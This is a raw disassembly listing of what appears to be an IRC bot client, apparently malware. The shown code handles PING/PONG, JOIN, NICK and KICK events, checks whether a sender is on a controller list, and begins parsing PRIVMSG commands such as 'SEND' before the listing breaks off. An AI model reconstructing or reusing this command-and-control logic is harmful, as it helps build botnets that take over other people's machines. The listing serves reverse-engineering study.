mov esi, eax
cmp esi, ebx
jle short loc_401C95
push 7D0h
call ds:dword_4F6380 ; Sleep
jmp short loc_401C52
; ---------------------------------------------------------------------------
loc_401C95: ; CODE XREF: sub_401B4F+137�j
cmp esi, 0FFFFFFFDh
jz short loc_401CBF
cmp esi, 0FFFFFFFEh
jz short loc_401CBB
cmp esi, 0FFFFFFFFh
jz loc_401BF7
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jl short loc_401C4F
jmp loc_401BFE
; ---------------------------------------------------------------------------
loc_401CBB: ; CODE XREF: sub_401B4F+14E�j
push 1
jmp short loc_401CC1
; ---------------------------------------------------------------------------
loc_401CBF: ; CODE XREF: sub_401B4F+149�j
push 2
loc_401CC1: ; CODE XREF: sub_401B4F+16E�j
pop eax
jmp loc_401BF9
sub_401B4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401CC7(int Src,int,int,int,char *Source,int,int,int,int,FILE *File,int)
sub_401CC7 proc near ; CODE XREF: sub_401B4F+12A�p
var_5D98 = dword ptr -5D98h
var_5D88 = dword ptr -5D88h
var_5988 = byte ptr -5988h
var_5588 = byte ptr -5588h
var_53F8 = byte ptr -53F8h
var_51F8 = byte ptr -51F8h
Dest = byte ptr -50F4h
FullPath = byte ptr -4FF4h
var_4EF0 = byte ptr -4EF0h
var_4DF0 = byte ptr -4DF0h
var_4CF0 = byte ptr -4CF0h
var_4BF0 = byte ptr -4BF0h
var_4AF0 = byte ptr -4AF0h
var_48F0 = byte ptr -48F0h
var_47EC = byte ptr -47ECh
var_46EC = byte ptr -46ECh
var_45EC = dword ptr -45ECh
var_4588 = byte ptr -4588h
Str = byte ptr -4488h
var_4288 = byte ptr -4288h
var_4188 = byte ptr -4188h
var_4088 = byte ptr -4088h
var_3F88 = dword ptr -3F88h
var_3F84 = byte ptr -3F84h
var_3F04 = byte ptr -3F04h
var_3E00 = byte ptr -3E00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = dword ptr -3CF8h
var_3CF4 = dword ptr -3CF4h
var_3CF0 = dword ptr -3CF0h
var_3CEC = dword ptr -3CECh
var_3CE8 = dword ptr -3CE8h
var_3CE4 = byte ptr -3CE4h
var_3C64 = byte ptr -3C64h
var_3BE4 = byte ptr -3BE4h
var_3B64 = byte ptr -3B64h
var_3AE4 = byte ptr -3AE4h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = dword ptr -3A5Ch
var_3A58 = dword ptr -3A58h
var_3A54 = byte ptr -3A54h
var_37CD = byte ptr -37CDh
var_37CC = byte ptr -37CCh
var_36C8 = dword ptr -36C8h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B8 = dword ptr -36B8h
var_36B4 = dword ptr -36B4h
var_36AC = dword ptr -36ACh
var_36A8 = dword ptr -36A8h
var_36A4 = byte ptr -36A4h
var_3624 = byte ptr -3624h
var_35A4 = byte ptr -35A4h
var_3524 = byte ptr -3524h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = dword ptr -3498h
var_3494 = dword ptr -3494h
var_3490 = byte ptr -3490h
var_3410 = byte ptr -3410h
var_3390 = byte ptr -3390h
var_3310 = byte ptr -3310h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = dword ptr -3284h
var_3280 = dword ptr -3280h
var_327C = byte ptr -327Ch
var_31FC = byte ptr -31FCh
var_317C = byte ptr -317Ch
var_30FC = byte ptr -30FCh
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = dword ptr -3070h
var_306C = dword ptr -306Ch
var_3068 = byte ptr -3068h
var_2FE8 = byte ptr -2FE8h
var_2F68 = byte ptr -2F68h
var_2EE8 = byte ptr -2EE8h
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = dword ptr -2E60h
var_2E5C = dword ptr -2E5Ch
Filename = byte ptr -2E58h
var_2D54 = dword ptr -2D54h
var_2D50 = byte ptr -2D50h
var_2C4C = byte ptr -2C4Ch
var_2B48 = dword ptr -2B48h
var_2B44 = dword ptr -2B44h
var_2B40 = dword ptr -2B40h
var_2B3C = byte ptr -2B3Ch
var_2ABC = dword ptr -2ABCh
var_2AB8 = dword ptr -2AB8h
var_2AB4 = dword ptr -2AB4h
var_2AB0 = dword ptr -2AB0h
var_2AA8 = byte ptr -2AA8h
var_2990 = byte ptr -2990h
var_2910 = dword ptr -2910h
var_290C = dword ptr -290Ch
var_2908 = dword ptr -2908h
var_2904 = dword ptr -2904h
var_2900 = dword ptr -2900h
var_28FC = dword ptr -28FCh
var_28F8 = byte ptr -28F8h
var_2878 = byte ptr -2878h
var_2778 = byte ptr -2778h
var_2678 = dword ptr -2678h
var_2674 = dword ptr -2674h
var_2670 = dword ptr -2670h
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
var_2660 = dword ptr -2660h
var_265C = dword ptr -265Ch
var_2658 = dword ptr -2658h
var_2654 = dword ptr -2654h
var_2650 = byte ptr -2650h
var_25D0 = byte ptr -25D0h
var_24D0 = byte ptr -24D0h
var_23D0 = dword ptr -23D0h
var_23CC = dword ptr -23CCh
var_23C8 = dword ptr -23C8h
var_23C4 = dword ptr -23C4h
var_23C0 = dword ptr -23C0h
var_23BC = dword ptr -23BCh
var_23B8 = dword ptr -23B8h
var_23B4 = dword ptr -23B4h
var_23B0 = dword ptr -23B0h
var_23AC = dword ptr -23ACh
var_23A8 = byte ptr -23A8h
var_2328 = byte ptr -2328h
var_22A8 = byte ptr -22A8h
var_2228 = dword ptr -2228h
var_2224 = dword ptr -2224h
var_2220 = dword ptr -2220h
var_221C = dword ptr -221Ch
var_2218 = dword ptr -2218h
var_2214 = byte ptr -2214h
var_2194 = byte ptr -2194h
var_2114 = byte ptr -2114h
var_2094 = dword ptr -2094h
var_2090 = dword ptr -2090h
var_208C = dword ptr -208Ch
var_2088 = dword ptr -2088h
var_2084 = dword ptr -2084h
var_2080 = byte ptr -2080h
var_2000 = byte ptr -2000h
var_1F80 = byte ptr -1F80h
var_1F00 = dword ptr -1F00h
var_1EFC = dword ptr -1EFCh
var_1EF8 = dword ptr -1EF8h
var_1EF4 = dword ptr -1EF4h
var_1EF0 = dword ptr -1EF0h
var_1EEC = byte ptr -1EECh
var_1DEC = byte ptr -1DECh
var_1D6C = dword ptr -1D6Ch
var_1D64 = dword ptr -1D64h
var_1D60 = dword ptr -1D60h
var_1D5C = dword ptr -1D5Ch
var_1D58 = dword ptr -1D58h
var_1D54 = dword ptr -1D54h
var_1D50 = dword ptr -1D50h
var_1D48 = byte ptr -1D48h
var_1D34 = byte ptr -1D34h
var_1C30 = byte ptr -1C30h
var_1BAC = dword ptr -1BACh
var_1BA8 = dword ptr -1BA8h
var_1BA4 = dword ptr -1BA4h
var_1BA0 = dword ptr -1BA0h
var_1B9C = dword ptr -1B9Ch
var_1B94 = byte ptr -1B94h
var_1B80 = byte ptr -1B80h
var_1A7C = byte ptr -1A7Ch
var_19FC = dword ptr -19FCh
var_19F8 = dword ptr -19F8h
var_19F4 = dword ptr -19F4h
var_19F0 = dword ptr -19F0h
var_19EC = dword ptr -19ECh
var_19E8 = dword ptr -19E8h
var_19E4 = byte ptr -19E4h
var_1964 = byte ptr -1964h
var_1924 = byte ptr -1924h
var_1824 = dword ptr -1824h
var_1820 = dword ptr -1820h
var_1814 = dword ptr -1814h
var_1810 = dword ptr -1810h
var_180C = dword ptr -180Ch
var_1808 = byte ptr -1808h
var_17D0 = byte ptr -17D0h
var_17B4 = byte ptr -17B4h
var_177C = byte ptr -177Ch
var_1778 = byte ptr -1778h
var_16F8 = byte ptr -16F8h
var_16B8 = byte ptr -16B8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = dword ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = byte ptr -1614h
var_1594 = byte ptr -1594h
var_1514 = dword ptr -1514h
var_1510 = dword ptr -1510h
var_150C = dword ptr -150Ch
var_1508 = dword ptr -1508h
var_1504 = byte ptr -1504h
var_14F4 = byte ptr -14F4h
var_1474 = byte ptr -1474h
var_13F4 = dword ptr -13F4h
var_13EC = dword ptr -13ECh
var_13E8 = dword ptr -13E8h
var_13E4 = dword ptr -13E4h
var_13E0 = dword ptr -13E0h
var_13DC = dword ptr -13DCh
var_13D8 = dword ptr -13D8h
var_13D4 = byte ptr -13D4h
var_1354 = byte ptr -1354h
var_12D4 = byte ptr -12D4h
var_1254 = dword ptr -1254h
var_1250 = dword ptr -1250h
var_124C = dword ptr -124Ch
var_1248 = dword ptr -1248h
var_1244 = dword ptr -1244h
var_1240 = dword ptr -1240h
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1230 = byte ptr -1230h
var_11B0 = byte ptr -11B0h
var_1130 = dword ptr -1130h
var_112C = dword ptr -112Ch
var_1128 = dword ptr -1128h
var_1120 = dword ptr -1120h
var_111C = dword ptr -111Ch
var_1118 = dword ptr -1118h
var_1110 = dword ptr -1110h
var_110C = byte ptr -110Ch
var_108C = byte ptr -108Ch
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF8 = dword ptr -0FF8h
var_FF4 = dword ptr -0FF4h
var_FF0 = dword ptr -0FF0h
var_FEC = dword ptr -0FECh
var_FE8 = byte ptr -0FE8h
var_F68 = dword ptr -0F68h
var_F64 = dword ptr -0F64h
var_F60 = dword ptr -0F60h
var_F5C = dword ptr -0F5Ch
var_F58 = dword ptr -0F58h
var_F54 = byte ptr -0F54h
var_ED4 = dword ptr -0ED4h
var_ED0 = dword ptr -0ED0h
var_ECC = dword ptr -0ECCh
var_EC8 = dword ptr -0EC8h
var_EC4 = dword ptr -0EC4h
var_EC0 = byte ptr -0EC0h
var_E40 = dword ptr -0E40h
var_E3C = dword ptr -0E3Ch
var_E38 = dword ptr -0E38h
var_E34 = dword ptr -0E34h
var_E30 = byte ptr -0E30h
var_E10 = byte ptr -0E10h
var_E00 = byte ptr -0E00h
var_D80 = dword ptr -0D80h
var_D7C = byte ptr -0D7Ch
var_CFC = byte ptr -0CFCh
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = dword ptr -0C70h
var_C6C = dword ptr -0C6Ch
var_C68 = dword ptr -0C68h
var_C64 = dword ptr -0C64h
var_C60 = dword ptr -0C60h
var_C5C = dword ptr -0C5Ch
var_C58 = dword ptr -0C58h
var_C54 = byte ptr -0C54h
var_BD4 = dword ptr -0BD4h
var_BD0 = dword ptr -0BD0h
var_BCC = dword ptr -0BCCh
var_BC8 = dword ptr -0BC8h
var_BC4 = byte ptr -0BC4h
var_B44 = dword ptr -0B44h
var_B40 = dword ptr -0B40h
var_B3C = dword ptr -0B3Ch
var_B38 = dword ptr -0B38h
var_B34 = dword ptr -0B34h
var_B30 = dword ptr -0B30h
var_B2C = byte ptr -0B2Ch
var_AAC = dword ptr -0AACh
var_AA8 = dword ptr -0AA8h
var_AA4 = dword ptr -0AA4h
var_AA0 = dword ptr -0AA0h
var_A9C = dword ptr -0A9Ch
var_A98 = dword ptr -0A98h
var_A94 = byte ptr -0A94h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = dword ptr -0A04h
var_A00 = dword ptr -0A00h
var_9FC = byte ptr -9FCh
var_97C = word ptr -97Ch
var_978 = dword ptr -978h
var_970 = dword ptr -970h
var_96C = dword ptr -96Ch
var_968 = dword ptr -968h
var_960 = byte ptr -960h
var_8FF = byte ptr -8FFh
var_8FE = byte ptr -8FEh
var_8FC = byte ptr -8FCh
var_8FB = byte ptr -8FBh
var_8F2 = byte ptr -8F2h
var_8F0 = byte ptr -8F0h
var_8EE = byte ptr -8EEh
var_8ED = byte ptr -8EDh
var_860 = byte ptr -860h
var_850 = byte ptr -850h
var_7D0 = byte ptr -7D0h
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_734 = dword ptr -734h
var_730 = dword ptr -730h
var_728 = dword ptr -728h
var_724 = dword ptr -724h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_714 = dword ptr -714h
var_710 = byte ptr -710h
var_690 = dword ptr -690h
var_688 = dword ptr -688h
var_684 = dword ptr -684h
var_680 = dword ptr -680h
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_668 = dword ptr -668h
var_63C = dword ptr -63Ch
var_638 = word ptr -638h
var_624 = dword ptr -624h
var_620 = byte ptr -620h
var_5A0 = byte ptr -5A0h
var_590 = dword ptr -590h
var_58C = dword ptr -58Ch
var_584 = dword ptr -584h
var_580 = dword ptr -580h
var_57C = dword ptr -57Ch
var_574 = dword ptr -574h
var_570 = byte ptr -570h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4E0 = dword ptr -4E0h
var_4D8 = dword ptr -4D8h
var_4D4 = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
Drive = byte ptr -4C8h
var_4BC = byte ptr -4BCh
var_484 = byte ptr -484h
var_474 = byte ptr -474h
var_3F4 = byte ptr -3F4h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_34C = dword ptr -34Ch
var_348 = dword ptr -348h
var_344 = dword ptr -344h
var_340 = dword ptr -340h
Str1 = byte ptr -338h
var_31C = word ptr -31Ch
var_31A = word ptr -31Ah
var_318 = dword ptr -318h
var_30C = byte ptr -30Ch
Count = dword ptr -308h
var_2FC = byte ptr -2FCh
var_2F8 = byte ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E8 = byte ptr -2E8h
var_2E4 = byte ptr -2E4h
var_2E3 = byte ptr -2E3h
var_2E2 = byte ptr -2E2h
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = dword ptr -2C4h
Dst = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
SubStr = byte ptr -0A0h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_90 = dword ptr -90h
Args = byte ptr -8Ch
Format = dword ptr -88h
Str2 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_50 = byte ptr -50h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Source = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
File = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 5D88h
call __alloca_probe
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_A4], 3
mov [ebp+var_10], ebx
mov [ebp+var_A8], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_2C4], ebx
call _memset
push 1Bh ; Count
lea eax, [ebp+Str1]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 18h
cmp [ebp+Src], ebx
jz loc_402166
push esi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
dec esi
lea eax, [ebp+Str]
push esi ; Count
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+Str]
push offset SubStr ; " :"
push eax ; Str
call _strstr
mov [ebp+var_C], eax
lea eax, [ebp+Str]
push esi ; Count
push eax ; Source
lea eax, [ebp+var_4AF0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_4AF0]
push offset Delim ; " "
push eax ; Str
call _strtok
add esp, 34h
mov [ebp+var_90], eax
lea esi, [ebp+Args]
push 1Fh
pop edi
loc_401D92: ; CODE XREF: sub_401CC7+DE�j
push offset asc_440B90 ; " "
push ebx ; Str
call _strtok
mov [esi], eax
pop ecx
add esi, 4
dec edi
pop ecx
jnz short loc_401D92
mov esi, [ebp+var_90]
cmp esi, ebx
jz loc_402166
cmp dword ptr [ebp+Args], ebx
jz loc_402166
push 100h ; Size
lea eax, [ebp+var_960]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_14]
push 1Fh
pop edx
push 1
pop edi
loc_401DDF: ; CODE XREF: sub_401CC7+14A�j
mov eax, [ecx]
cmp eax, ebx
jz short loc_401E0B
cmp byte ptr [eax], 2Dh
jnz short loc_401E13
cmp [eax+2], bl
jnz short loc_401E13
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_960], 1
mov esi, [ebp+var_90]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_401E0B: ; CODE XREF: sub_401CC7+11C�j
dec edx
sub ecx, 4
cmp edx, ebx
jge short loc_401DDF
loc_401E13: ; CODE XREF: sub_401CC7+121�j
; sub_401CC7+126�j
cmp [ebp+var_8ED], bl
jz short loc_401E1E
mov [ebp+var_8], edi
loc_401E1E: ; CODE XREF: sub_401CC7+152�j
cmp [ebp+var_8F2], bl
jz short loc_401E2C
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_401E2C: ; CODE XREF: sub_401CC7+15D�j
cmp byte ptr [esi], 0Ah
jz short loc_401E66
push 7Fh ; Count
lea eax, [ebp+var_E00]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [esi+1]
push 17h ; Count
push eax ; Source
lea eax, [ebp+var_C0]
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C0]
push offset asc_440B94 ; "!"
push eax ; Str
call _strtok
add esp, 20h
loc_401E66: ; CODE XREF: sub_401CC7+168�j
push esi ; Str2
push offset aPing ; "PING"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401EB7
push dword ptr [ebp+Args] ; Args
mov byte ptr [esi+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_401F5B
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
add esp, 10h
jmp loc_401F5B
; ---------------------------------------------------------------------------
loc_401EB7: ; CODE XREF: sub_401CC7+1AE�j
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset a001 ; "001"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CDA
push esi ; Str2
push offset a005 ; "005"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_409CDA
push esi ; Str2
push offset a302_0 ; "302"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F1F
push offset a@ ; "@"
push [ebp+Str2] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_401F5B
inc eax
push 9Fh ; Count
push eax ; Source
push [ebp+arg_1C] ; Dest
call _strncpy
jmp short loc_401F58
; ---------------------------------------------------------------------------
loc_401F1F: ; CODE XREF: sub_401CC7+22F�j
push esi ; Str2
push offset a433_0 ; "433"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F62
push ebx ; Str1
push dword_44009C ; int
push dword_440098 ; int
push [ebp+Source] ; Dest
call sub_40B487
add esp, 10h
push [ebp+Source] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
loc_401F58: ; CODE XREF: sub_401CC7+256�j
add esp, 0Ch
loc_401F5B: ; CODE XREF: sub_401CC7+1CF�j
; sub_401CC7+1EB�j ...
mov eax, edi
jmp loc_402169
; ---------------------------------------------------------------------------
loc_401F62: ; CODE XREF: sub_401CC7+267�j
mov esi, [ebp+arg_18]
mov [ebp+var_2C8], 3
mov edi, 80h
loc_401F74: ; CODE XREF: sub_401CC7+2D2�j
lea eax, [ebp+var_E00]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_401F91
mov [ebp+var_A8], 1
loc_401F91: ; CODE XREF: sub_401CC7+2BE�j
add esi, edi
dec [ebp+var_2C8]
jnz short loc_401F74
mov esi, dword ptr [ebp+Args]
push esi ; Str2
push offset aKick ; "KICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40208B
mov esi, [ebp+arg_18]
mov [ebp+File], 3
loc_401FC0: ; CODE XREF: sub_401CC7+389�j
cmp [esi], bl
jz loc_40204B
push 7Fh ; Count
lea eax, [ebp+var_E00]
push esi ; Source
push eax ; Dest
call _strncpy
lea eax, [ebp+var_C0]
add esp, 0Ch
test eax, eax
jz short loc_40204B
cmp [ebp+Str2], ebx
jz short loc_40204B
push [ebp+Str2] ; Str2
lea eax, [ebp+var_C0]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40204B
lea eax, [ebp+var_C0]
mov [esi], bl
push eax
lea eax, [ebp+Dst]
push offset asc_440C14 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4] ; int
call sub_409D26
lea eax, [ebp+Dst]
push eax
call sub_415C77
add esp, 14h
loc_40204B: ; CODE XREF: sub_401CC7+2FB�j
; sub_401CC7+31B�j ...
add esi, edi
dec [ebp+File]
jnz loc_401FC0
push [ebp+Str2] ; Str2
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_402166
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push [ebp+arg_8] ; Args
mov [eax], ebx
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_40207E: ; CODE XREF: sub_401CC7+5EE�j
; sub_401CC7+8A4�j ...
push [ebp+arg_4] ; int
call sub_409D26
jmp loc_404492
; ---------------------------------------------------------------------------
loc_40208B: ; CODE XREF: sub_401CC7+2E9�j
push esi ; Str2
push offset aNick ; "NICK"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4021CE
mov eax, [ebp+Format]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+Src], 3
mov [ebp+File], eax
loc_4020B4: ; CODE XREF: sub_401CC7+43F�j
lea eax, [ebp+var_E00]
push eax ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_402101
lea eax, [ebp+var_E00]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_402101
push [ebp+File] ; Source
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax ; Dest
call _strcpy
push [ebp+arg_1C] ; Source
push edi ; Dest
call _strcat
add esp, 10h
mov edi, 80h
loc_402101: ; CODE XREF: sub_401CC7+3FE�j
; sub_401CC7+415�j
add esi, edi
dec [ebp+Src]
jnz short loc_4020B4
lea eax, [ebp+var_C0]
test eax, eax
jz short loc_402166
cmp [ebp+File], ebx
jz short loc_402166
push [ebp+Source] ; Str2
lea eax, [ebp+var_C0]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40213E
push 0Fh ; Count
push [ebp+File] ; Source
push [ebp+Source] ; Dest
call _strncpy
jmp loc_4038B6
; ---------------------------------------------------------------------------
loc_40213E: ; CODE XREF: sub_401CC7+463�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_402143: ; CODE XREF: sub_401CC7+49D�j
cmp [edi], bl
jz short loc_40215A
lea eax, [ebp+var_E00]
push eax ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40216E
loc_40215A: ; CODE XREF: sub_401CC7+47E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_402143
loc_402166: ; CODE XREF: sub_401CC7+5B�j
; sub_401CC7+E8�j ...
push 1
loc_402168: ; CODE XREF: sub_401CC7+2A56�j
pop eax
loc_402169: ; CODE XREF: sub_401CC7+296�j
; sub_401CC7+2A78�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40216E: ; CODE XREF: sub_401CC7+491�j
lea eax, [ebp+var_E00]
push 21h ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz short loc_402166
push eax ; Str
call _strlen
push [ebp+File] ; Str
mov edi, eax
call _strlen
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_402166
push [ebp+Src]
shl esi, 7
push [ebp+File]
add esi, [ebp+arg_18]
push offset aSS_1 ; ":%s%s"
push esi ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_45EC]
push ebx ; int
push eax ; int
push [ebp+arg_8] ; Str
push [ebp+arg_4] ; int
call sub_409D6C
add esp, 24h
jmp short loc_402166
; ---------------------------------------------------------------------------
loc_4021CE: ; CODE XREF: sub_401CC7+3D3�j
push esi ; Str2
push offset aPart ; "PART"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4021F0
push esi ; Str2
push offset aQuit ; "QUIT"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40221D
loc_4021F0: ; CODE XREF: sub_401CC7+516�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_4021F5: ; CODE XREF: sub_401CC7+54E�j
cmp [edi], bl
jz short loc_40220B
push [ebp+var_90] ; Str2
push edi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_402259
loc_40220B: ; CODE XREF: sub_401CC7+530�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_4021F5
mov esi, dword ptr [ebp+Args]
loc_40221D: ; CODE XREF: sub_401CC7+527�j
push esi ; Str2
push offset a353 ; "353"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4022BA
push [ebp+var_80] ; Str2
push [ebp+arg_8] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40224C
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40224C: ; CODE XREF: sub_401CC7+57A�j
push [ebp+var_80]
push offset unk_440CB4
jmp loc_409CCE
; ---------------------------------------------------------------------------
loc_402259: ; CODE XREF: sub_401CC7+542�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+Dst]
push offset asc_440C74 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C77
push dword ptr [ebp+Args] ; Str2
push offset aPart_0 ; "PART"
call _strcmp
add esp, 18h
test eax, eax
jnz loc_402166
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+var_90]
inc eax
push eax
push offset aNoticeSS_0 ; "NOTICE %s :%s\r\n"
jmp loc_40207E
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401CC7+565�j
push esi ; Str2
push offset aPrivmsg ; "PRIVMSG"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4022FD
push esi ; Str2
push offset aNotice ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4022FD
push esi ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409B47
cmp dword_440088, ebx
jz loc_409B47
loc_4022FD: ; CODE XREF: sub_401CC7+602�j
; sub_401CC7+613�j
push esi ; Str2
push offset aPrivmsg_0 ; "PRIVMSG"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40248D
push esi ; Str2
push offset aNotice_0 ; "NOTICE"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40248D
mov eax, [ebp+Str2]
inc [ebp+var_80]
mov [ebp+var_A4], 4
mov [ebp+Format], eax
loc_402340: ; CODE XREF: sub_401CC7+882�j
; sub_401CC7+8B8�j ...
mov eax, [ebp+var_A4]
mov esi, eax
shl esi, 2
mov eax, [ebp+esi+var_90]
lea edi, [ebp+esi+var_90]
push eax ; Str2
push offset dword_440D4C ; Str1
mov [ebp+arg_8], eax
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40271D
push dword ptr [ebp+esi+Args] ; Str2
push offset aSend ; "SEND"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4025E4
cmp [ebp+var_A8], ebx
jz loc_4025BD
push [ebp+esi+Format]
lea eax, [ebp+var_1B80]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_1B94]
push [ebp+esi+Str2]
push offset aS_0 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+esi+var_80] ; Str
call _atoi
mov [ebp+var_19FC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1B9C], eax
lea eax, [ebp+var_C0]
push 7Fh ; Count
push eax ; Source
